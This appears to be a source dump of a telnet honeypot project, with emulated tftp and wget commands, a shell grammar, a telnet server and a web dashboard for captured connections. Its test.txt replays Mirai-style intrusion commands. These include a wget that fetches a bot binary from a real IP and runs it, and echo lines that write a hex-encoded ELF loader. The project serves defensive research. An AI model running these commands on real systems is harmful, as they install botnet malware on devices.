| from base import Proc 11 | 12 | from util.config import config 13 | 14 | class DummyIO(io.RawIOBase): 15 | 16 | def __init__(self): 17 | self.data = "" 18 | 19 | def write(self, s): 20 | self.data += s 21 | 22 | class StaticTftp(Proc): 23 | 24 | def run(self, env, args): 25 | Tftp().run(env, args) 26 | 27 | class Tftp: 28 | 29 | help = """BusyBox v1.22.1 (Ubuntu 1:1.22.0-15ubuntu1) multi-call binary. 30 | 31 | Usage: tftp [OPTIONS] HOST [PORT] 32 | 33 | Transfer a file from/to tftp server 34 | 35 | -l FILE Local FILE 36 | -r FILE Remote FILE 37 | -g Get file 38 | -p Put file 39 | -b SIZE Transfer blocks of SIZE octets 40 | 41 | """ 42 | 43 | def run(self, env, args): 44 | self.env = env 45 | self.connected = False 46 | self.chunks = 0 47 | 48 | try: 49 | opts, args = easy_getopt(args, "l:r:gpb:") 50 | except GetoptError as e: 51 | env.write("tftp: " + str(e) + "\n") 52 | env.write(Tftp.help) 53 | return 54 | 55 | if len(args) == 0: 56 | env.write(Tftp.help) 57 | return 58 | elif len(args) == 1: 59 | host = args[0] 60 | port = 69 61 | 62 | if ":" in host: 63 | parts = host.split(":") 64 | host = parts[0] 65 | port = int(parts[1]) 66 | 67 | else: 68 | host = args[0] 69 | port = int(args[1]) 70 | 71 | if "-p" in opts: 72 | env.write("tftp: option 'p' not implemented\n") 73 | return 74 | if "-b" in opts: 75 | env.write("tftp: option 'b' not implemented\n") 76 | return 77 | 78 | if "-r" in opts: 79 | path = opts["-r"] 80 | else: 81 | print Tftp.help 82 | return 83 | 84 | if "-l" in opts: 85 | fname = opts["-l"] 86 | else: 87 | fname = path 88 | 89 | try: 90 | data = self.download(host, port, path) 91 | env.writeFile(fname, data) 92 | 93 | env.action("download", { 94 | "url": "tftp://" + host + ":" + str(port) + "/" + path, 95 | "path": fname, 96 | "info": None, 97 | "data": data 98 | }) 99 | 100 | self.env.write("\nFinished. Saved to " + fname + ".\n") 101 | except: 102 | env.write("tftp: timeout\n") 103 | env.action("download", { 104 | "url": "tftp://" + host + ":" + str(port) + "/" + path, 105 | "path": fname, 106 | "info": None, 107 | "data": None 108 | }) 109 | 110 | def download(self, host, port, fname): 111 | if config.get("fake_dl", optional=True, default=False): 112 | return str(hash(host + str(port) + fname)) 113 | 114 | output = DummyIO() 115 | client = TftpClient(host, port) 116 | 117 | self.env.write("Trying " + host + ":" + str(port) + " ... ") 118 | client.download(fname, output, timeout=5, packethook=self.pkt) 119 | return output.data 120 | 121 | def pkt(self, data): 122 | if not(self.connected): 123 | self.env.write("OK\n") 124 | self.connected = True 125 | #if self.chunks % 60 == 0: 126 | # self.env.write("\n") 127 | self.chunks += 1 128 | #self.env.write(".") 129 | 130 | Proc.register("tftp", StaticTftp()) 131 | 132 | -------------------------------------------------------------------------------- /honeypot/shell/commands/wget.py: -------------------------------------------------------------------------------- 1 | 2 | import requests 3 | import traceback 4 | import datetime 5 | import urlparse 6 | 7 | from util.config import config 8 | 9 | from base import Proc 10 | 11 | class Wget(Proc): 12 | 13 | def dl(self, env, url, path=None, echo=True): 14 | u = urlparse.urlparse(url) 15 | 16 | host = u.hostname 17 | ip = "127.0.0.1" 18 | port = u.port if u.port else 80 19 | date = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") 20 | 21 | if echo: 22 | env.write("--"+date+"-- " + url + "\n") 23 | env.write("Resolving " + host + " (" + host + ")... " + ip + "\n") 24 | env.write("Connecting to " + host + " (" + host + ")|" + ip + "|:" + str(port) + "...") 25 | 26 | if path == None: 27 | path = url.split("/")[-1].strip() 28 | if path == "": 29 | path = "index.html" 30 | 31 | if config.get("fake_dl", optional=True, default=False): 32 | data = str(hash(url)) 33 | info = "" 34 | else: 35 | hdr = { "User-Agent" : "Wget/1.15 (linux-gnu)" } 36 | r = None 37 | try: 38 | r = requests.get(url, stream=True, timeout=5.0, headers=hdr) 39 | if echo: 40 | env.write(" connected\n") 41 | env.write("HTTP request sent, awaiting response... 200 OK\n") 42 | env.write("Length: unspecified [text/html]\n") 43 | env.write("Saving to: '"+path+"'\n\n") 44 | env.write(" 0K .......... 7,18M=0,001s\n\n") 45 | env.write(date+" (7,18 MB/s) - '"+path+"' saved [11213]\n") 46 | 47 | data = "" 48 | for chunk in r.iter_content(chunk_size = 4096): 49 | data = data + chunk 50 | 51 | info = "" 52 | for his in r.history: 53 | info = info + "HTTP " + str(his.status_code) + "\n" 54 | for k,v in his.headers.iteritems(): 55 | info = info + k + ": " + v + "\n" 56 | info = info + "\n" 57 | 58 | info = info + "HTTP " + str(r.status_code) + "\n" 59 | for k,v in r.headers.iteritems(): 60 | info = info + k + ": " + v + "\n" 61 | except requests.ConnectTimeout as e: 62 | data = None 63 | info = "Download failed" 64 | if echo: 65 | env.write(" failed: Connection timed out.\n") 66 | env.write("Giving up.\n\n") 67 | except requests.ConnectionError as e: 68 | data = None 69 | info = "Download failed" 70 | if echo: 71 | env.write(" failed: Connection refused.\n") 72 | env.write("Giving up.\n\n") 73 | except requests.ReadTimeout as e: 74 | data = None 75 | info = "Download failed" 76 | if echo: 77 | env.write(" failed: Read timeout.\n") 78 | env.write("Giving up.\n\n") 79 | except Exception as e: 80 | data = None 81 | info = "Download failed" 82 | if echo: 83 | env.write(" failed: " + str(e.message) + ".\n") 84 | env.write("Giving up.\n\n") 85 | 86 | 87 | if data: 88 | env.writeFile(path, data) 89 | 90 | env.action("download", { 91 | "url": url, 92 | "path": path, 93 | "info": info, 94 | "data": data 95 | }) 96 | 97 | def run(self, env, args): 98 | if len(args) == 0: 99 | env.write("""BusyBox v1.22.1 (Ubuntu 1:1.22.0-19ubuntu2) multi-call binary. 100 | 101 | Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet] [-O|--output-document FILE] 102 | [--header 'header: value'] [-Y|--proxy on/off] [-P DIR] 103 | [-U|--user-agent AGENT] URL... 104 | 105 | Retrieve files via HTTP or FTP 106 | 107 | -s Spider mode - only check file existence 108 | -c Continue retrieval of aborted transfer 109 | -q Quiet 110 | -P DIR Save to DIR (default .) 111 | -O FILE Save to FILE ('-' for stdout) 112 | -U STR Use STR for User-Agent header 113 | -Y Use proxy ('on' or 'off') 114 | 115 | """) 116 | return 1 117 | else: 118 | echo = True 119 | for arg in args: 120 | if arg == "-O": 121 | echo = False 122 | for url in args: 123 | if url.startswith("http"): 124 | self.dl(env, url, echo=echo) 125 | return 0 126 | 127 | Proc.register("wget", Wget()) 128 | -------------------------------------------------------------------------------- /honeypot/shell/grammar.peg: -------------------------------------------------------------------------------- 1 | grammar cmd 2 | 3 | cmd <- cmdlist / empty 4 | cmdlist <- cmdsingle (sep (";" / "&") sep cmdlist)? %make_list 5 | cmdsingle <- cmdpipe (sep ("||" / "&&") sep cmdsingle)? %make_single 6 | cmdpipe <- cmdredir (sep ("|" !"|") sep cmdpipe)? %make_pipe 7 | cmdredir <- cmdargs ( sep (">>-" / ">>" / "<<" / "<>" / "<&" / ">&" / "<" / ">") sep arg )* %make_redir 8 | cmdargs <- cmdbrac / args 9 | cmdbrac <- "(" sep cmd sep ")" %make_cmdbrac 10 | args <- arg (" "+ arg)* %make_args 11 | 12 | arg <- arg_quot1 / arg_quot2 / arg_noquot / empty 13 | arg_noempty <- arg_quot1 / arg_quot2 / arg_noquot 14 | arg_quot1 <- "'" [^']* "'" %make_arg_quot 15 | arg_quot2 <- '"' [^"]* '"' %make_arg_quot 16 | arg_noquot <- [^ ;|&()"'><]+ %make_arg_noquot 17 | 18 | empty <- ""? 19 | sep <- " "* 20 | -------------------------------------------------------------------------------- /honeypot/shell/test.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | canopy grammar.peg --lang python && python shell.py < test.txt 3 | 4 | -------------------------------------------------------------------------------- /honeypot/shell/test.txt: -------------------------------------------------------------------------------- 1 | cp 2 | ls 3 | cat 4 | dd 5 | rm 6 | echo 7 | busybox 8 | sh 9 | cd 10 | true 11 | false 12 | chmod 13 | uname 14 | : 15 | ps 16 | 17 | enable 18 | shell 19 | sh 20 | /bin/busybox ECCHI 21 | /bin/busybox ps; /bin/busybox ECCHI 22 | /bin/busybox cat /proc/mounts; /bin/busybox ECCHI 23 | /bin/busybox echo -e '\x6b\x61\x6d\x69/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon 24 | /bin/busybox echo -e '\x6b\x61\x6d\x69/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon 25 | /bin/busybox echo -e '\x6b\x61\x6d\x69/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon 26 | /bin/busybox echo -e '\x6b\x61\x6d\x69/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon 27 | /bin/busybox echo -e '\x6b\x61\x6d\x69' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon 28 | /bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon 29 | /bin/busybox echo -e '\x6b\x61\x6d\x69/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon 30 | /bin/busybox echo -e '\x6b\x61\x6d\x69/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/. 31 | /bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon 32 | /bin/busybox ECCHI 33 | rm /proc/.t; rm /proc/.sh; rm /proc/.human 34 | rm /sys/.t; rm /sys/.sh; rm /sys/.human 35 | rm /tmp/.t; rm /tmp/.sh; rm /tmp/.human 36 | rm /overlay/.t; rm /overlay/.sh; rm /overlay/.human 37 | rm /.t; rm /.sh; rm /.human 38 | rm /dev/.t; rm /dev/.sh; rm /dev/.human 39 | rm /dev/pts/.t; rm /dev/pts/.sh; rm /dev/pts/.human 40 | rm /sys/kernel/debug/.t; rm /sys/kernel/debug/.sh; rm /sys/kernel/debug/.human 41 | rm /dev/.t; rm /dev/.sh; rm /dev/.human 42 | cd /proc/ 43 | /bin/busybox cp /bin/echo dvrpelper; >dvrpelper; /bin/busybox chmod 777 dvrpelper; /bin/busybox ECCHI 44 | /bin/busybox cat /bin/echo 45 | /bin/busybox ECCHI 46 | /bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI 47 | /bin/busybox wget http://95.215.60.17:80/bins/miraint.x86 -O - > dvrpelper; /bin/busybox chmod 777 dvrpelper; /bin/busybox ECCHI 48 | ./dvrpelper telnet.x86.bot.wget; /bin/busybox IHCCE 49 | rm -rf upnp; > dvrpelper; /bin/busybox ECCHI 50 | cat /proc/mounts; (/bin/busybox DFYHE || :) 51 | echo -ne "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x28\x00\x01\x00\x00\x00\x54\x00\x01\x00\x34\x00\x00\x00\x40\x01\x00\x00\x00\x02\x00\x05\x34\x00\x20\x00\x01\x00\x28\x00\x04\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00" >> .s 52 | echo -ne "\x00\x00\x01\x00\xf8\x00\x00\x00\xf8\x00\x00\x00\x05\x00\x00\x00\x00\x00\x01\x00\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x06\x20\xa0\xe3\x07\x00\x2d\xe9\x01\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x0c\xd0\x8d\xe2\x00\x60\xa0\xe1\x70\x10\x8f\xe2\x10\x20\xa0\xe3" >> .s 53 | echo -ne "\x07\x00\x2d\xe9\x03\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x14\xd0\x8d\xe2\x4f\x4f\x4d\xe2\x05\x50\x45\xe0\x06\x00\xa0\xe1\x04\x10\xa0\xe1\x4b\x2f\xa0\xe3\x01\x3c\xa0\xe3\x0f\x00\x2d\xe9\x0a\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x10\xd0\x8d\xe2" >> .s 54 | echo -ne "\x00\x50\x85\xe0\x00\x00\x50\xe3\x04\x00\x00\xda\x00\x20\xa0\xe1\x01\x00\xa0\xe3\x04\x10\xa0\xe1\x04\x00\x90\xef\xee\xff\xff\xea\x4f\xdf\x8d\xe2\x00\x00\x40\xe0\x01\x70\xa0\xe3\x00\x00\x00\xef\x02\x00\x68\xab\xb1\x67\xe2\xc5\x41\x26\x00\x00\x00\x61\x65\x61" >> .s 55 | echo -ne "\x62\x69\x00\x01\x1c\x00\x00\x00\x05\x43\x6f\x72\x74\x65\x78\x2d\x41\x35\x00\x06\x0a\x07\x41\x08\x01\x09\x02\x2a\x01\x44\x01\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x41\x52\x4d\x2e\x61\x74\x74\x72\x69\x62\x75\x74\x65\x73\x00" >> .s 56 | echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x54\x00\x01\x00\x54\x00\x00\x00\xa4\x00\x00\x00" >> .s 57 | echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x03\x00\x00\x70\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x27\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00" >> .s 58 | echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x01\x00\x00\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" >> .s 59 | cat .s 60 | /bin/busybox wget; /bin/busybox 81c46036wget; /bin/busybox echo -ne '\x0181c46036\x7f'; /bin/busybox printf '\00281c46036\177'; /bin/echo -ne '\x0381c46036\x7f'; /usr/bin/printf '\00481c46036\177'; /bin/busybox tftp; /bin/busybox 81c46036tftp; 61 | 62 | -------------------------------------------------------------------------------- /honeypot/telnet.py: -------------------------------------------------------------------------------- 1 | import struct 2 | import socket 3 | import traceback 4 | import time 5 | 6 | from thread import start_new_thread 7 | 8 | from session import Session 9 | from util.dbg import dbg 10 | from util.config import config 11 | 12 | class IPFilter: 13 | 14 | def __init__(self): 15 | self.map = {} 16 | self.timeout = config.get("telnet_ip_min_time_between_connections") 17 | 18 | def add_ip(self, ip): 19 | self.map[ip] = time.time() 20 | 21 | def is_allowed(self, ip): 22 | self.clean() 23 | return not(ip in self.map) 24 | 25 | def clean(self): 26 | 27 | todelete = [] 28 | 29 | for ip in self.map: 30 | if self.map[ip] + self.timeout < time.time(): 31 | todelete.append(ip) 32 | 33 | for ip in todelete: 34 | del self.map[ip] 35 | 36 | class Telnetd: 37 | cmds = {} 38 | cmds[240] = "SE - subnegoation end" 39 | cmds[241] = "NOP - no operation" 40 | cmds[242] = "DM - data mark" 41 | cmds[243] = "BRK - break" 42 | cmds[244] = "IP - interrupt process" 43 | cmds[245] = "AO - abort output" 44 | cmds[246] = "AYT - are you there" 45 | cmds[247] = "EC - erase char" 46 | cmds[248] = "EL - erase line" 47 | cmds[249] = "GA - go ahead" 48 | cmds[250] = "SB - subnegotiation" 49 | cmds[251] = "WILL - positive return" 50 | cmds[252] = "WONT - negative return" 51 | cmds[253] = "DO - set option" 52 | cmds[254] = "DONT - unset option" 53 | cmds[255] = "IAC - interpret as command" 54 | 55 | SE = 240 56 | NOP = 241 57 | DM = 242 58 | BRK = 243 59 | IP = 244 60 | AO = 245 61 | AYT = 246 62 | EC = 247 63 | EL = 248 64 | GA = 249 65 | SB = 250 66 | WILL = 251 67 | WONT = 252 68 | DO = 253 69 | DONT = 254 70 | IAC = 255 71 | 72 | # Options 73 | NAWS = 31 74 | 75 | def __init__(self, addr, port): 76 | self.host = addr 77 | self.port = port 78 | self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 79 | self.do_run = True 80 | self.ipfilter = IPFilter() 81 | 82 | def run(self): 83 | self.sock.bind((self.host, self.port)) 84 | self.sock.listen(10) 85 | self.sock.settimeout(None) 86 | dbg("Socket open on " + str(self.host) + ":" + str(self.port)) 87 | while self.do_run: 88 | try: 89 | self.handle() 90 | except: 91 | traceback.print_exc() 92 | self.sock.close() 93 | dbg("Socket Closed") 94 | 95 | def handle(self): 96 | conn = False 97 | try: 98 | conn, addr = self.sock.accept() 99 | dbg("Client connected at " + str(addr)) 100 | 101 | if self.ipfilter.is_allowed(addr[0]): 102 | self.ipfilter.add_ip(addr[0]) 103 | sess = TelnetSess(self, conn, addr) 104 | start_new_thread(sess.loop, ()) 105 | else: 106 | dbg("Connection limit for " + addr[0] + " exceeded, closing") 107 | conn.close() 108 | except: 109 | traceback.print_exc() 110 | 111 | def stop(self): 112 | self.do_run = False 113 | 114 | class TelnetSess: 115 | def __init__(self, serv, sock, remote): 116 | self.serv = serv 117 | self.sock = sock 118 | self.timeout = config.get("telnet_session_timeout") 119 | self.maxtime = config.get("telnet_max_session_length") 120 | self.db_id = 0 121 | self.remote = remote 122 | self.session = None 123 | 124 | def loop(self): 125 | self.session = Session(self.send_string, self.remote[0]) 126 | 127 | dbg("Setting timeout to " + str(self.timeout) + " seconds") 128 | self.sock.settimeout(self.timeout) 129 | 130 | try: 131 | self.test_opt(1) 132 | 133 | # Kill of Session if longer than self.maxtime 134 | ts_start = int(time.time()) 135 | 136 | self.send_string("Login: ") 137 | u = self.recv_line() 138 | self.send_string("Password: ") 139 | p = self.recv_line() 140 | 141 | self.send_string("\r\nWelcome to EmbyLinux 3.13.0-24-generic\r\n") 142 | 143 | self.session.login(u, p) 144 | 145 | while True: 146 | l = self.recv_line() 147 | 148 | try: 149 | self.session.shell(l) 150 | except: 151 | traceback.print_exc() 152 | self.send_string("sh: error\r\n") 153 | 154 | if ts_start + self.maxtime < int(time.time()): 155 | dbg("Session too long. Killing off.") 156 | break 157 | 158 | except socket.timeout: 159 | dbg("Connection timed out") 160 | except EOFError: 161 | dbg("Connection closed") 162 | 163 | self.session.end() 164 | self.sock.close() 165 | 166 | def test_naws(self): 167 | #dbg("TEST NAWS") 168 | if self.test_opt(Telnetd.NAWS): 169 | self.need(Telnetd.IAC) 170 | self.need(Telnetd.SB) 171 | self.need(Telnetd.NAWS) 172 | 173 | w = self.recv_short() 174 | h = self.recv_short() 175 | 176 | self.need(Telnetd.IAC) 177 | self.need(Telnetd.SE) 178 | 179 | #dbg("TEST NAWS OK " + str(w) + "x" + str(h)) 180 | elif byte == Telnetd.WONT: 181 | pass 182 | #dgb("TEST NAWS FAILED") 183 | else: 184 | raise ValueError() 185 | 186 | def test_linemode(self): 187 | #dbg("TEST LINEMODE") 188 | if self.test_opt(34): 189 | self.need(Telnetd.IAC) 190 | self.need(Telnetd.SE) 191 | 192 | def test_opt(self, opt, do=True): 193 | #dbg("TEST " + str(opt)) 194 | 195 | self.send(Telnetd.IAC) 196 | if do: 197 | self.send(Telnetd.DO) 198 | else: 199 | self.send(Telnetd.DONT) 200 | self.send(opt) 201 | 202 | def send(self, byte): 203 | #if byte in Telnetd.cmds: 204 | # dbg("SEND " + str(Telnetd.cmds[byte])) 205 | #else: 206 | # dbg("SEND " + str(byte)) 207 | self.sock.send(chr(byte)) 208 | 209 | def send_string(self, msg): 210 | self.sock.send(msg) 211 | #dbg("SEND STRING LEN" + str(len(msg))) 212 | 213 | def recv(self): 214 | byte = self.sock.recv(1) 215 | if len(byte) == 0: 216 | raise EOFError 217 | byte = ord(byte) 218 | #if byte in Telnetd.cmds: 219 | # dbg("RECV " + str(Telnetd.cmds[byte])) 220 | #else: 221 | # dbg("RECV " + str(byte)) 222 | return byte 223 | 224 | def recv_line(self): 225 | line = "" 226 | while True: 227 | byte = self.recv() 228 | if byte == Telnetd.IAC: 229 | byte = self.recv() 230 | self.process_cmd(byte) 231 | elif byte == ord("\r"): 232 | pass 233 | elif byte == ord("\n"): 234 | break 235 | else: 236 | line = line + chr(byte) 237 | #dbg("RECV STRING " + line) 238 | return line 239 | 240 | def recv_short(self): 241 | bytes = self.sock.recv(2) 242 | short = struct.unpack("!H", bytes)[0] 243 | #dbg("RECV SHORT " + str(short)) 244 | return short 245 | 246 | def need(self, byte_need): 247 | byte = ord(self.sock.recv(1)) 248 | #if byte in Telnetd.cmds: 249 | # dbg("RECV " + str(Telnetd.cmds[byte])) 250 | #else: 251 | # dbg("RECV " + str(byte)) 252 | if byte != byte_need: 253 | dbg("BAD " + "PROTOCOL ERROR. EXIT.") 254 | raise ValueError() 255 | return byte 256 | 257 | def process_cmd(self, cmd): 258 | if cmd == Telnetd.DO: 259 | byte = self.recv() 260 | self.send(Telnetd.IAC) 261 | self.send(Telnetd.WONT) 262 | self.send(byte) 263 | if cmd == Telnetd.WILL or cmd == Telnetd.WONT: 264 | byte = self.recv() 265 | 266 | -------------------------------------------------------------------------------- /html/.gitignore: -------------------------------------------------------------------------------- 1 | db.php 2 | apiurl.js 3 | -------------------------------------------------------------------------------- /html/admin.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |
4 |

Administration Area

5 |
6 | 7 | 8 |
9 |

Login

10 |
11 |
12 | 13 | 14 |
15 |
16 | 17 | 18 |
19 | 20 |
21 |
22 | 23 |
24 |

Add a new user

25 |
26 |
27 | 28 | 29 |
30 |
31 | 32 | 33 |
34 | 35 |
36 |
37 |
38 | 39 |
40 |
41 | 42 | -------------------------------------------------------------------------------- /html/apiurl.js: -------------------------------------------------------------------------------- 1 | var api = window.location.protocol + "//" + window.location.host; 2 | -------------------------------------------------------------------------------- /html/asn.html: -------------------------------------------------------------------------------- 1 |

ASN Info

2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 |
Name{{ asn.name }}
Country {{ asn.countryname }}
ASNAS{{ asn.asn }}
Internet Registry{{ REGISTRIES[asn.reg] }}
More Info AS{{ asn.asn }} on bgp.he.net
12 | 13 |

Connections from AS{{ asn.asn }} more

14 | 15 |
16 | 17 |

URLs located in AS{{ asn.asn }}

18 | 19 | 20 | 21 | 22 | 23 | 24 |
ConnectionsUrlSample
{{ url.connections }}{{ url.url }}{{ url.sample }}
25 | 26 | Coming soon 27 | -------------------------------------------------------------------------------- /html/common.js: -------------------------------------------------------------------------------- 1 | 2 | var fakenames = ["Boar","Stallion","Yak","Beaver","Salamander","Eagle Owl","Impala","Elephant","Chameleon","Argali","Lemur","Addax","Colt","Whale","Dormouse","Budgerigar","Dugong","Squirrel","Okapi","Burro","Fish","Crocodile","Finch","Bison","Gazelle","Basilisk","Puma","Rooster","Moose","Musk Deer","Thorny Devil","Gopher","Gnu","Panther","Porpoise","Lamb","Parakeet","Marmoset","Coati","Alligator","Elk","Antelope","Kitten","Capybara","Mule","Mouse","Civet","Zebu","Horse","Bald Eagle","Raccoon","Pronghorn","Parrot","Llama","Tapir","Duckbill Platypus","Cow","Ewe","Bighorn","Hedgehog","Crow","Mustang","Panda","Otter","Mare","Goat","Dingo","Hog","Mongoose","Guanaco","Walrus","Springbok","Dog","Kangaroo","Badger","Fawn","Octopus","Buffalo","Doe","Camel","Shrew","Lovebird","Gemsbok","Mink","Lynx","Wolverine","Fox","Gorilla","Silver Fox","Wolf","Ground Hog","Meerkat","Pony","Highland Cow","Mynah Bird","Giraffe","Cougar","Eland","Ferret","Rhinoceros"]; 3 | 4 | function extractHash() { 5 | var table = {}; 6 | var values = window.location.hash.substr(1); 7 | values = values.split("&"); 8 | for (var i = 0; i < values.length; i++) { 9 | var tuple = values[i].split("="); 10 | var name = tuple[0]; 11 | var value = tuple.length > 1 ? tuple[1] : null; 12 | table[name] = value; 13 | } 14 | return table; 15 | } 16 | 17 | function formatDate(date) { 18 | d = new Date(date * 1000); 19 | return d.toTimeString().replace(/.*(\d{2}:\d{2}:\d{2}).*/, "$1"); 20 | } 21 | 22 | var months = ["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Okt", "Nov", "Dez"]; 23 | 24 | function formatDay(date) { 25 | d = new Date(date * 1000); 26 | return d.getDate() + " " + months[d.getMonth()]; 27 | } 28 | 29 | function formatDateTime(date) { 30 | if (date == null) return ""; 31 | d = new Date(date * 1000); 32 | return d.getDate() + "." + (d.getMonth()+1) + " " + d.toTimeString().replace(/.*(\d{2}:\d{2}):\d{2}.*/, "$1"); 33 | } 34 | 35 | function time() { 36 | return Math.round(new Date().getTime() / 1000); 37 | } 38 | 39 | function nicenull (str, el) { 40 | if (str == null || str == "") 41 | return el; 42 | else 43 | return str; 44 | } 45 | 46 | function short (str, l) { 47 | if (str) 48 | return str.substring(0, l) + "..."; 49 | else 50 | return "None"; 51 | } 52 | 53 | function encurl(url) { 54 | return btoa(url); 55 | } 56 | 57 | function decurl(url) { 58 | return atob(url); 59 | } 60 | -------------------------------------------------------------------------------- /html/connection.html: -------------------------------------------------------------------------------- 1 |

Connection Info

2 | 3 | 4 | 5 | 6 | 7 | 12 | 13 | 14 | 15 | 16 | 23 | 24 | 25 | 26 | 27 | 33 | 34 | 35 | 36 | 42 | 43 | 44 | 45 | 48 | 49 | 50 | 51 |
Date{{ formatDate(connection.date) }}
Duration{{ connection.duration }} seconds
Network / Malware 8 | #{{ connection.network.id }} 9 | / 10 | {{ connection.network.malware.name != null ? connection.network.malware.name : fakenames[connection.network.malware.id] }} 11 |
Honeypot name{{ connection.backend_user }}
IP 17 | {{ connection.city + ', ' + connection.countryname }} map
18 | {{ connection.ip }}
19 | AS{{ connection.asn.asn }} {{ connection.asn.name }} 20 |
21 | {{ connection.ipblock }} 22 |
User : Password "{{ connection.user }}" : "{{ connection.password }}"
Prior Connections 28 |

29 | {{ formatDate(associate.date) }} from 30 | {{ associate.ip }} 31 |

32 |
Subsequent Connections 37 |

38 | {{ formatDate(associate.date) }} from 39 | {{ associate.ip }} 40 |

41 |
Tags 46 | {{ tag.name }} 47 |
52 | 53 |
54 |

URLs gathered

55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 |
UrlFirst SeenSample
{{ url.url }}{{ formatDate(url.date) }}{{ short(url.sample, 16) }}
70 |
71 | 72 |
73 |

Session text show output

74 | 75 |
76 |
Session Text does not include non-ascii characters
77 | {{ event.data }} 78 |
79 |
80 | -------------------------------------------------------------------------------- /html/connectionlist-embed.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 |
DateIPASNCountryUsernamePasswordN⁰ Urls
{{ formatDate(connection.date) }} {{ connection.ip }} {{ connection.asn.asn }} {{ connection.country }} {{ connection.user }} {{ connection.password }} {{ connection.urls }}
23 | -------------------------------------------------------------------------------- /html/connectionlist.html: -------------------------------------------------------------------------------- 1 |

Connections

2 | 3 |
4 |
5 | Filters: 6 | 9 |
10 |

You may use the url bar to edit filters

11 |

Available arguments: ["ipblock", "user", "password", "ip", "country", "asn_id"]

12 |
13 |
14 | {{ k }} == {{ v }} {{ k == 'country' ? '(' + COUNTRY_LIST[v] + ')' : '' }} {{ $last ? '' : ', ' }} 15 |
16 | 17 |
18 | 19 |
20 | 21 |
-------------------------------------------------------------------------------- /html/countries.js: -------------------------------------------------------------------------------- 1 | var COUNTRY_LIST = {"AF":"Afghanistan","AX":"Åland Islands","AL":"Albania","DZ":"Algeria","AS":"American Samoa","AD":"AndorrA","AO":"Angola","AI":"Anguilla","AQ":"Antarctica","AG":"Antigua and Barbuda","AR":"Argentina","AM":"Armenia","AW":"Aruba","AU":"Australia","AT":"Austria","AZ":"Azerbaijan","BS":"Bahamas","BH":"Bahrain","BD":"Bangladesh","BB":"Barbados","BY":"Belarus","BE":"Belgium","BZ":"Belize","BJ":"Benin","BM":"Bermuda","BT":"Bhutan","BO":"Bolivia","BA":"Bosnia and Herzegovina","BW":"Botswana","BV":"Bouvet Island","BR":"Brazil","IO":"British Indian Ocean Territory","BN":"Brunei Darussalam","BG":"Bulgaria","BF":"Burkina Faso","BI":"Burundi","KH":"Cambodia","CM":"Cameroon","CA":"Canada","CV":"Cape Verde","KY":"Cayman Islands","CF":"Central African Republic","TD":"Chad","CL":"Chile","CN":"China","CX":"Christmas Island","CC":"Cocos (Keeling) Islands","CO":"Colombia","KM":"Comoros","CG":"Congo","CD":"Congo, The Democratic Republic of the","CK":"Cook Islands","CR":"Costa Rica","CI":"Cote D'Ivoire","HR":"Croatia","CU":"Cuba","CY":"Cyprus","CZ":"Czech Republic","DK":"Denmark","DJ":"Djibouti","DM":"Dominica","DO":"Dominican Republic","EC":"Ecuador","EG":"Egypt","SV":"El Salvador","GQ":"Equatorial Guinea","ER":"Eritrea","EE":"Estonia","ET":"Ethiopia","FK":"Falkland Islands (Malvinas)","FO":"Faroe Islands","FJ":"Fiji","FI":"Finland","FR":"France","GF":"French Guiana","PF":"French Polynesia","TF":"French Southern 